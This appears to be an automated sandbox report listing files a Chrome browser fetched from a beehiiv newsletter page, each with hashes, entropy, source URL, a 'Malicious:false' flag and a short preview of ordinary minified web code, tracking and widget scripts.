                                                                                                                                            SSDEEP:1536:p4yGNPSHxyJscvHPiYlKvB4dLfMCeuqTzzMRcALoPxZKpnFyVC3L:6yGdSHxUaYlKWxfHqTzzIiZKpD
                                                                                                                                            MD5:4BEEBE87EFE3853BCD7EC9CEA3C3D472
                                                                                                                                            SHA1:3D139C39CA7E1FAFBF9769E8C8A2EE496C009BBE
                                                                                                                                            SHA-256:09AA83676EBCC3EBD5E2DFB2C04F7CE6A87E507C7D2006DFE822F7A2BD9B2C57
                                                                                                                                            SHA-512:50350B962C3A8DDE345BA7BDD5F49B397E5CE35D3ECB455BFFBA5C9A2D9CE91031D87C82330E818352108C9CE1BF688B90007D84D39BDCDCD95D1BA8AE4BE09F
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="dcfeed40-a5d5-514d-b4d9-80bf1ea599a5")}catch(e){}}();.import{j as se}from"./jsx-runtime-BjG_zV1W.js";import{r as Jt,g as Ts}from"./index-D6da9p6-.js";import{w as Pt,x as vs,b as le,D as Qe,l as f,y as rt,G as R,C as bs,k,z as In,A as W,B as tn,E as ht,F as oe,H as Sr,r as at,d as gt,n as Is,I as yr,e as F,f as U,J as S,K as $t,a as T,u as nt,T as Tr,s as b,L as fe,M as yt,N as en,O as nn,P as O,Q as ie,R as Rs,U as kt,V as ws,W as Rn,X as Ns,Y as vr,m as x,Z as Zt,S as J,_ as As,q as Tt,$ as br,a0 as wn,a1 as ks,a2 as Cs,a3 as Os,a4 as xs,a5 as rn,a6 as sn,a7 as Pe,a8 as Ps,a9 as $s,aa as Ds,ab as Nn,ac as on,ad as An,p as Fs,ae as an,af as Ms,ag as $e,ah as Ir,ai as kn,aj as cn,ak as et,t as ot,al as Cn,am as Rr,an as wr,ao as Nr,ap as De,aq as Ar,ar as Ls,as as Fe,at as ae,c as
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (354), with no line terminators
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):354
                                                                                                                                            Entropy (8bit):3.9817192497670133
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:ctBsA2FlJ/soyqxGJshsSyzaaJ26oDMbamfBtO/dXlBXH7ERReqlUKSkRcD8:NA2DJHyqAJKzyza4n+mvO/dXlBXHolz5
                                                                                                                                            MD5:615B5AA60CE931D112CB7569A1295E3B
                                                                                                                                            SHA1:8981CB4B1763D359BF5C8C45426B527CBA6F8C4A
                                                                                                                                            SHA-256:520FF5CD30A829B4AAC56A04438FB4574B9ADC8BC22AF931A7FA4C84EEA8D728
                                                                                                                                            SHA-512:5A76CDC7D5725449971CA16BA44919CBD775B027F31FA5E08CE5AD5E61E6E425EC88BA05F706373E74EC2BDA4DEDA374E4E1B82F1EA287B1596C5C92920CDDC4
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://stk.hsprotect.net/ns?c=d19b4f80-d36c-11ef-b05e-b3c96211093f
                                                                                                                                            Preview:8d8284c593834ee0647e1cf1d51fb11d525c4ee44d01a580fd87dc087fab6b9182b7edc2d46e47e26276207ed33e5798edc4a69fd3639f027ae1c1e5f50c7c6d6d7b0ff1de549c6842eef6f841d7b75115b86538342a98fcc906596975f053fd26acbdc88d62b059e683df08b35b8ebc8ec0b1108656b94335b6a700ab8af7b5c46f34fba182ee29f6fc73e9bdfa95d10ba44acc196189aefe0040c8969a884af21d2b5f37b97be451cf9809f073ab8c8e
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (56043)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):327164
                                                                                                                                            Entropy (8bit):5.5061054495525745
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:zcLShNRXSBeNN9dDon/kyvRweEXMV6AxBUjqN3Lj1TKid0bGpLsev6nsRs2hW/:W8N9+/k4fMqz9GCNvmszU
                                                                                                                                            MD5:81267302EFDFB3E4524A22631A8FC99E
                                                                                                                                            SHA1:EFB274E7D019D5F3CDBEE88D317F46FE45BC91EE
                                                                                                                                            SHA-256:70C00445D6632039ED99AF760731DAF3BF60EB12061863EE61E2CD7276A54D18
                                                                                                                                            SHA-512:D378A12E5465E2DEFBBB794D1F5CA287D8A9B31E16482F782DC6C53D9F6CB4600B8B2ADCAAC0CCF963AA06B42569C8119E16987F59FB052B4AB1254784ED5EF0
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://platform.twitter.com/widgets/widget_iframe.2f70fb173b9000da126c79afe2098f02.html?origin=https%3A%2F%2Fkanes-newsletter-871ead.beehiiv.com
                                                                                                                                            Preview:<!DOCTYPE HTML>.<meta chartset="utf-8">.<title>Twitter Widget Iframe</title>.<body>.<script type="text/javascript">!function(){Function&&Function.prototype&&Function.prototype.bind&&(/(MSIE ([6789]|10|11))|Trident/.test(navigator.userAgent)||function(e){var t={};function r(n){if(t[n])return t[n].exports;var i=t[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,r),i.l=!0,i.exports}r.m=e,r.c=t,r.d=function(e,t,n){r.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},r.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},r.t=function(e,t){if(1&t&&(e=r(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(r.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var i in e)r.d(n,i,function(t){return e[t]}.bind(null,i));return n},r.n=function(e){var t=e&&e.__esModule?functi
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (1346)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):1711
                                                                                                                                            Entropy (8bit):5.4356839471371705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkE1szNEYh/4Z2+IN0OB6rAzoGP4KQ9zLs2:QrYhAZ2+wn2AzVP4Pzd
                                                                                                                                            MD5:417B56AF92EB5204A8AC45476F9A6904
                                                                                                                                            SHA1:70A34B9B2D87CD56C30BCDA8508E75D788B75555
                                                                                                                                            SHA-256:6CF35132CF46638A07D3212A8EC7033DE81A828CFB6E1C49E6D7765620D66A68
                                                                                                                                            SHA-512:3E9B437C307277F0D10D97BB8DB96ECA2625E120272B15A0E9F445D8BE9ED5021A0BDE7DE8FE9A71F9B0203FAC93201B5EB78D993F6EF8F5BD7DD00FCB30AC50
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/relativeTime-tlGPeD3Q.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="ff96dcd1-9738-5b63-88c1-9cbb061aef52")}catch(e){}}();.import{c as j,g as B}from"./index-D6da9p6-.js";var b={exports:{}};(function(w,N){(function(a,f){w.exports=f()})(j,function(){return function(a,f,u){a=a||{};var e=f.prototype,y={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function x(r,t,i,m){return e.fromToBase(r,t,i,m)}u.en.relativeTime=y,e.fromToBase=function(r,t,i,m,g){for(var l,d,h,c=i.$locale().relativeTime||y,v=a.thresholds||[{l:"s",r:44,d:"second"},{l:"m",r:89},{l:"mm",r:44,d:"minute"},{l:"h",r:89},{l:"hh",r:21,d:"hour"},{l:"d",r:35},{l:"dd",r:25,d:"day"},{l:"M",r:45},{l:"MM",r:10,d:"month"},{l:"y",r:17},{l:"yy",d:"year"}],$=v.length,s=0;s
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5099)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):9596
                                                                                                                                            Entropy (8bit):5.651009861031609
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:LEnlSPI8IWIsIEIvIgI0I/I3IdedP1wFr+4FcV/GE6QabAbD1SHx6D9ZSzFvhoD+:MlSwlrVtQZdgY0wEAHAbD/9EXoM0Vc
                                                                                                                                            MD5:AC58E4E0C677252A6BDB6C18233CF475
                                                                                                                                            SHA1:71695FFC269FFC0E5D699240B955870DEBCC20A3
                                                                                                                                            SHA-256:8038D93627C15E83F6E695A28830713D7189518C5281354624DA0D1CDD4C6910
                                                                                                                                            SHA-512:9EE77C534D40A35138A29638EA598A0F8F7C024EDC456ADAC20AC5A028C08A4A0A3A43DD71EC951E2B45C0B8A9012D8210FFFE2742A4A2D48C3449FA520FFD7A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="0c0f59e1-ca5d-5613-9b3a-6d1ed902a60d")}catch(e){}}();.import{j as o}from"./jsx-runtime-BjG_zV1W.js";import{g as y,r as d,u as K}from"./index-D6da9p6-.js";import{T as M}from"./index-BdpAPpdN.js";import{u as k}from"./useTranslation-CfKJAmGY.js";import{L as E}from"./components-Oj2xMfGE.js";import{F as j}from"./ArrowLeftIcon-Dz9QYxn0.js";const g={inter:"Inter",libre_caslon_text:"Libre Caslon Text",space_mono:"Space Mono",quicksand:"Quicksand"},N={inter:{family:"Inter",variants:["100","200","300","regular","500","600","700","800","900"],subsets:["cyrillic","cyrillic-ext","greek","greek-ext","latin","latin-ext","vietnamese"],version:"v12",lastModified:"2022-09-22",files:{100:"http://fonts.gstatic.com/s/inter/v12/UcCO3FwrK3iLTeHuS_fvQtMwCp50KnMw2boKoduKmMEVuLyeMZhrib2Bg-4.ttf",200:"http
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (614)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1149
                                                                                                                                            Entropy (8bit):5.409419982652436
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:UgqHHVvCaRuSPCwNq7ENl1cQm4dyszpWQeBAf2uc3cCx:JWkE+wNqc3umV1WRvf3nx
                                                                                                                                            MD5:CB4B02FADE761331CD0F6917B26ECE45
                                                                                                                                            SHA1:3A9AC3DA54ED58281E75A0EFE3BC95C621EA2153
                                                                                                                                            SHA-256:4589197DFD4D616103A75C0DD5E557B315DC018BD5164FFF60F21767F9936718
                                                                                                                                            SHA-512:E742A86D084576230F5A9C5BCC3E475F41B875F44F9DA002DB101E93EF6A144663A640FBDEFB8B0C311C29A2610A486EC07C4094D9DD14CFD42F9B47981A36D1
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="d95ed293-e5f4-591e-9d87-7da711cb696c")}catch(e){}}();.import{g as c}from"./index-D6da9p6-.js";var i={exports:{}};/*!..Copyright (c) 2018 Jed Watson...Licensed under the MIT License (MIT), see..http://jedwatson.github.io/classnames.*/(function(e){(function(){var f={}.hasOwnProperty;function s(){for(var t="",r=0;r<arguments.length;r++){var n=arguments[r];n&&(t=o(t,a(n)))}return t}function a(t){if(typeof t=="string"||typeof t=="number")return t;if(typeof t!="object")return"";if(Array.isArray(t))return s.apply(null,t);if(t.toString!==Object.prototype.toString&&!t.toString.toString().includes("[native code]"))return t.toString();var r="";for(var n in t)f.call(t,n)&&t[n]&&(r=o(r,n));return r}function o(t,r){return r?t?t+" "+r:t+r:t}e.exports?(s.default=s,e.exports=s):window.classNames=
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (18184)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):18549
                                                                                                                                            Entropy (8bit):5.3549096031053525
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:v0hLNbLj27q/yn6huwEhVerExQUrWBrJ+lfps9qAFXbxaA:v0FNz2Ay0uwAVerExQUiBl+lfpstFXFz
                                                                                                                                            MD5:88E602E993D426566FCDDF1657EAD32A
                                                                                                                                            SHA1:52A55FE35DBE7E5E336FD333B09ACE94D2F5DF9C
                                                                                                                                            SHA-256:04EEE52A5C561343A7E0163C9C4707556B44172B80BECFA08B8E064A531BFE85
                                                                                                                                            SHA-512:EEE3F6CFF257705937305A50EF55DFCFD885A3B359A19DAC226FE152A1AAE1C8F5A6FFF628EFC0E137852303468C97BF2393C921A235DFC2CED9A37B2FA3113B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/CreateAction-Dl0JjCOR.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="9db0a2ad-5a8d-5638-919b-8c0c44a0307e")}catch(e){}}();.import{j as e}from"./jsx-runtime-BjG_zV1W.js";import{r as u,u as ue,a as me}from"./index-D6da9p6-.js";import{_ as H}from"./index-CqJN8iQq.js";import{S as pe}from"./StatusInputs-JkVhk_jg.js";import{a as fe,u as he,L as xe}from"./PageProvider-uKxoiNdl.js";import{u as ge}from"./useToast-DK42uF07.js";import{u as Y}from"./useTranslation-CfKJAmGY.js";import{u as Ee,d as ke,c as be}from"./components-Oj2xMfGE.js";import{c as N}from"./index-x2da_zcv.js";import{u as Q}from"./WebThemeContext-DttfuZxo.js";function Re(){return()=>{}}function Se(){return u.useSyncExternalStore(Re,()=>!0,()=>!1)}function ve({children:t,fallback:o=null}){return Se()?u.createElement(u.Fragment,null,t()):u.createElement(u.Fragment,null,o)}const _e="bhba",ot=.17
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (5219)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):11350
                                                                                                                                            Entropy (8bit):5.420207711957301
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:HJXKFXNnqpd+VQseCnVPwbGybNjqAAHembBnb9inDer4zMyQ2X+WyT8II+j0Dy:hKFXNnqp4VTVI6OUAAHeOb9inhm2XpyV
                                                                                                                                            MD5:CDB21B0E334A8B6268A401B0C5855ADA
                                                                                                                                            SHA1:BB8EDF2648276F004062994014A01F0B3B76F844
                                                                                                                                            SHA-256:4F149AE4B693E9E93B9094F70400F0AF1CA9B20D553A9E04187D95F06C2E02DA
                                                                                                                                            SHA-512:B901E69C35F0D464354C3B54BD3C3423ABA5A75C18322EC5C3487887CB86E9297758A94ADFCBED03502AD86F6ADBB96BF1481DAF85B8C09389B8FF8700912865
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-CqJN8iQq.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="1ab5baf0-06d1-516c-b13b-718e500199e0")}catch(e){}}();.import{r as c}from"./index-D6da9p6-.js";let S={data:""},_=t=>typeof window=="object"?((t?t.querySelector("#_goober"):window._goober)||Object.assign((t||document.head).appendChild(document.createElement("style")),{innerHTML:" ",id:"_goober"})).firstChild:t||S,H=/(?:([\u0080-\uFFFF\w-%@]+) *:? *([^{;]+?);|([^;}{]*?) *{)|(}\s*)/g,L=/\/\*[^]*?\*\/| +/g,D=/\n+/g,b=(t,e)=>{let a="",s="",o="";for(let r in t){let n=t[r];r[0]=="@"?r[1]=="i"?a=r+" "+n+";":s+=r[1]=="f"?b(n,r):r+"{"+b(n,r[1]=="k"?"":e)+"}":typeof n=="object"?s+=b(n,e?e.replace(/([^,])+/g,i=>r.replace(/(^:.*)|([^,])+/g,l=>/&/.test(l)?l.replace(/&/g,i):i?i+" "+l:l)):r):n!=null&&(r=/^--/.test(r)?r:r.replace(/[A-Z]/g,"-$&").toLowerCase(),o+=b.p?b.p(r,n):r+":"+n+";")}return a
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (44751)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):45064
                                                                                                                                            Entropy (8bit):5.083548901916587
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nI3IQpxtZj6yHXhflZdWVlyAZsHuGRaJLXsm02mT4GwLG+dTws8jLdYp0oW7hbn2:InpkyHv0y2G+pqjLW+xf2MuCwSS
                                                                                                                                            MD5:2FBF4F353D700412C39F8A044EED928C
                                                                                                                                            SHA1:F189A744B7BAF1D28C2E2290512597DE4EF6C60B
                                                                                                                                            SHA-256:AF901BCF60F667A58F95A15D388D4F3C98E593EC8ADB9BDFF2A3777E4B26B4CF
                                                                                                                                            SHA-512:018F9A6FAEDA89C326982282E053AF767913CC59CF10661DB1F9F3841A269B5DAC94FE8AB7A687142430D45DDAE27E59352DA98D80E3AD85A62FD693D578E9CC
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:window.__remixManifest={"entry":{"module":"/assets/entry.client-CuBsnk-1.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/assets/i18next-BV1g0mjb.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js"],"css":[]},"routes":{"root":{"id":"root","path":"","hasAction":false,"hasLoader":true,"hasClientAction":false,"hasClientLoader":false,"hasErrorBoundary":true,"module":"/assets/root-C5Mn_uH-.js","imports":["/assets/index-D6da9p6-.js","/assets/jsx-runtime-BjG_zV1W.js","/assets/AppGlobals-2Br-8bZs.js","/assets/dayjs.min-B8CfgAhU.js","/assets/performance-dfU_ZKaW.js","/assets/i18next-BV1g0mjb.js","/assets/components-Oj2xMfGE.js","/assets/context-CxfOs_9L.js","/assets/index-x2da_zcv.js","/assets/index-BdpAPpdN.js","/assets/useTranslation-CfKJAmGY.js","/assets/index-CqJN8iQq.js","/assets/StatusInputs-JkVhk_jg.js","/assets/PageProvider-uKxoiNdl.js","/assets
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1555
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):606
                                                                                                                                            Entropy (8bit):7.684173827328528
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:XQEwKaaoH0VCgMgPPnVhXNC6hecjL2se+Q7gxoAuJPxZyhlR0wz1Pk:XQEw+hZhPPrX46ocfERgKncf08k
                                                                                                                                            MD5:E9D4DB013D5154BF5DEA07A86EFDC826
                                                                                                                                            SHA1:3EC26EF21230B139585C8A4DEE0EDACF21E645D9
                                                                                                                                            SHA-256:1647D03E091826087EA981A97D69434D47CFE518EA4D41B09C198954F25E5D0C
                                                                                                                                            SHA-512:4B0D3FF26B2F6433DFA1CD2E285073BC54C4040A4CEFF0C6AF3F32EA90729AF22C0EBF53277D7201C5D793D65AD64F2AD19A1BF3F31A0ED3695380128A5D76A5
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/documentation_dae218aac2d25462ae286ceba8d80ce2.svg
                                                                                                                                            Preview:..........}TMo.A..+..u..x.+@JO\z..UB..i......3^.......[.g.,..........w...s.8..pv...u...U..y.<.V..}..._wc.|.o..?W..Lg#........p<n..r.-?.q.=...Y.!ANQ54....b..Ae0...\... .....Q.0.......2..~U.5.h..1o....<.G...C...jhZ.r..i.a*....19..$...[.!..+.2IW.....v.l....Y'.m'}%..I..{.\.0.d.D...X......cI].....7.k._..{|..\$...&..G..q.H...../.q......j....q..z.&.....X..sNp.N"1..h.`;j....q............C.....^...........j(. ..x.V....D.'.I...j@..(V.V.....!........!E.<..X-....R....U<.l.Qn.2..K.VP2UEtl#.,8..H..3..sp...(0.7....K...j..6.......M....p.E..d..((../..@.....&G...^.........z..............
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (2133)
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):2491
                                                                                                                                            Entropy (8bit):5.326876214965847
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:JWkEtWNGVpjp9lnwPqxtW3j9R3iSwwPlzSM5UepuMvI+edNH:QZp6iT2h4aleepJADdV
                                                                                                                                            MD5:D87E0A2E38F37F45013F1A5D35DB6E80
                                                                                                                                            SHA1:A7DE7325FA88C7A0292F792681D025A0CC0E639F
                                                                                                                                            SHA-256:CE008F40F1E53226463657118FFCF72A388E74E412702D23F7BC822E62AB71CA
                                                                                                                                            SHA-512:835D8C39DE5753144D5941BAC4E0E9260E6164C74FF0502595AA83EE8AE9358F1ABFC2A3D66BE6FA83F5506EFC7A1F59DC7F658DB1C73C0E68A9F50456B0D654
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/index-DTtuIjz-.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="8485e214-aa2f-5b59-b47e-c780d8fa0326")}catch(e){}}();.import{j as d}from"./jsx-runtime-BjG_zV1W.js";import{r as i}from"./index-D6da9p6-.js";import{T as m}from"./index-BdpAPpdN.js";import{c as h}from"./components-Oj2xMfGE.js";const f=i.createContext(null),c={didCatch:!1,error:null};class p extends i.Component{constructor(r){super(r),this.resetErrorBoundary=this.resetErrorBoundary.bind(this),this.state=c}static getDerivedStateFromError(r){return{didCatch:!0,error:r}}resetErrorBoundary(){const{error:r}=this.state;if(r!==null){for(var n,t,o=arguments.length,a=new Array(o),s=0;s<o;s++)a[s]=arguments[s];(n=(t=this.props).onReset)===null||n===void 0||n.call(t,{args:a,reason:"imperative-api"}),this.setState(c)}}componentDidCatch(r,n){var t,o;(t=(o=this.props).onError)===null||t===void 0|
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):644
                                                                                                                                            Entropy (8bit):5.530049014371309
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:UgDGH4LOaOvCaBfuS7GC1FENwcpakn9X467kXyOXXgC1z:UgqHHVvCaRuS7GC1FENtak9qXyOgC1z
                                                                                                                                            MD5:A41AB733D882553B95F56DEB91F13391
                                                                                                                                            SHA1:4124FE4E946697BE55D1DA1E92A88E5B2A113D99
                                                                                                                                            SHA-256:E05769DC04AB675BB9AF66936716C66A4B1C02F9E47DB449C1F4DC89CBA7E1FA
                                                                                                                                            SHA-512:A5DBD88FC0187E5223885B1D137FC56E0798FA16E6B4BC51AB707EC5966C8526EEC39C551894973A6A3E2084A47F5CCC64DD994ACF2715DDD38027AC3D72CF9C
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://kanes-newsletter-871ead.beehiiv.com/assets/RedirectToHiddenInput-mUb4yii7.js
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="96af6a21-d0b5-5eb3-aada-6630dd5334d1")}catch(e){}}();.import{j as n}from"./jsx-runtime-BjG_zV1W.js";import{a as r}from"./index-D6da9p6-.js";const c=({value:t,redirectToHome:a=!1})=>{const e=r(),o=a?`/${e.search}`:`${e.pathname}${e.search}`;return n.jsx("input",{type:"hidden",name:"redirect_to",value:t||o})};export{c as R};.//# sourceMappingURL=RedirectToHiddenInput-mUb4yii7.js.map..//# debugId=96af6a21-d0b5-5eb3-aada-6630dd5334d1.
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:ASCII text, with very long lines (9726)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10089
                                                                                                                                            Entropy (8bit):5.251832707456976
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:9Bq0j0sOnvxYmG8PIsR/p5IBlz8SMv5S/hUp/g2a3xvKwuIROKqheRX52RXWjCZl:/0sOPIsRsOs32/w3UeRp2YWZNSBU
                                                                                                                                            MD5:9A8F4D51D79DD6D3234287D878B1C84D
                                                                                                                                            SHA1:110032066B905CA07010318EA7AA36F354B3AF9C
                                                                                                                                            SHA-256:872019D9CB9357FC372941D263E53FC0632D8931BF671EA5ABC5F8846EE06655
                                                                                                                                            SHA-512:85EA7C67DE5B8F467AD5309DDD83EF92EBA1A5B6300B3BEEA4C7D882E0F3E897269D6919A05712EA2FB2EF0AAAE7FA87B70675F925E7D621550C3BDFE9A1B330
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            Preview:.!function(){try{var e="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{},n=(new Error).stack;n&&(e._sentryDebugIds=e._sentryDebugIds||{},e._sentryDebugIds[n]="aad4556e-25e7-5016-bf1d-13a319293c6b")}catch(e){}}();.import{r as a,e as E}from"./index-D6da9p6-.js";import{h as he,T as be,o as Ee,a as _}from"./use-is-mounted-BaHv16bB.js";import{s as R,u as F,b as J,l as Q,O as we,U as W,y as le,v as P,f as ie,o as L,g as re,C as ae}from"./keyboard-CaEu2o0u.js";import{p as oe}from"./bugs-DVQzBh-s.js";function Te(){return/iPhone/gi.test(window.navigator.platform)||/Mac/gi.test(window.navigator.platform)&&window.navigator.maxTouchPoints>0}function Ce(){return/Android/gi.test(window.navigator.userAgent)}function Fe(){return Te()||Ce()}function k(e,t,r){let l=R(t);a.useEffect(()=>{function c(f){l.current(f)}return document.addEventListener(e,c,r),()=>document.removeEventListener(e,c,r)},[e,r])}function Le(e,t,r){let l=R(t);a.useEffect(()=>{functio
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:C source, ASCII text
                                                                                                                                            Category:downloaded
                                                                                                                                            Size (bytes):8364
                                                                                                                                            Entropy (8bit):4.83779014004918
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:/qxvaPILdWdsapQmhQRqer+i8kbNYnuNzdxrDZqCm0R7z6aOA5RHsJ:uWwq7iFqnofsCOA5aJ
                                                                                                                                            MD5:C0E127164E594201E27BF23C83596835
                                                                                                                                            SHA1:FBEC7802FBCE8EDE85E46DF18CAE66EEBACB15E9
                                                                                                                                            SHA-256:E0BCF542E0C68EFDC4D06C566A2E1653212BE6D03D39050823F5E0884D225C52
                                                                                                                                            SHA-512:01D41A12A6FE5119CA8CD1463A2397C2FE5FA3DDB468C6B48694CCE78766807972FFC8B1D108C9CA1646C7FBF7788F91AA7DEE111E05144575B43D7B3BFEDF8A
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:low
                                                                                                                                            URL:https://beehiiv-adnetwork-production.s3.amazonaws.com/pixel-js.js
                                                                                                                                            Preview:(function() {. let log = () => {. };. const APIARY_ENDPOINT = "https://ingestion.apiary.beehiiv.net/api/v1/ingestion/pixel";. const ADNETWORK_ENDPOINT = "https://adnetwork.beehiiv.com";. let isSecure = true;. if (APIARY_ENDPOINT.includes("dev")) {. log = console.log;. isSecure = false;. }. try {. log("pixel-js");. let [ad_network_placement_id, subscriber_id, event, bhp] = get_bhcl_id();. if (ad_network_placement_id && !(subscriber_id || bhp)) {. getSubscriberId(. ad_network_placement_id,. ({ ad_network_placement_id: ad_network_placement_id2, subscriber_id: subscriber_id2, bhp: bhp2 }) => {. log("got subscriber_id", { subscriber_id: subscriber_id2, bhp: bhp2 });. sendInitialEvent(event, ad_network_placement_id2, subscriber_id2, bhp2);. }. );. } else {. sendInitialEvent(event, ad_network_placement_id, subscriber_id, bhp);. }. } catch (error) {. console.error(error);. }. function sendInitialEvent(even
                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                            File Type:Java source, ASCII text, with very long lines (657)
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1035
                                                                                                                                            Entropy (8bit):5.443865240069979
